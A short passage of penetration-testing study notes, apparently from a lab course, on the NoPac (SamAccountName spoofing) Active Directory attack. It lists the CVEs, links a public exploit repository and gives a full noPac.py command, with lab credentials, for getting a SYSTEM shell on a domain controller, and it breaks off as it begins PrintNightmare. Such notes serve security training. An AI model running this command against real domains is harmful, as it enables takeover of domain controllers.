More advanced attacks

NoPac (SamAccountName Spoofing)

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/sam-name-impersonation/ba-p/3042699

Also known as Sam_The_Admin vulnerability.

Involved CVEs:

2021-42278 2021-42287
42278 is a bypass vulnerability with the Security Account Manager (SAM). 42287 is a vulnerability within the Kerberos Privilege Attribute Certificate (PAC) in ADDS.

Exploit repo:

https://github.com/Ridter/noPac.git

Allows to get a SYSTEM run anything as SYSTEM on a DC for example.

To get a shell (noisy and possibly blocked by AV):

python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

PrintNightmare

This exploit a vulnerability in the print spooler.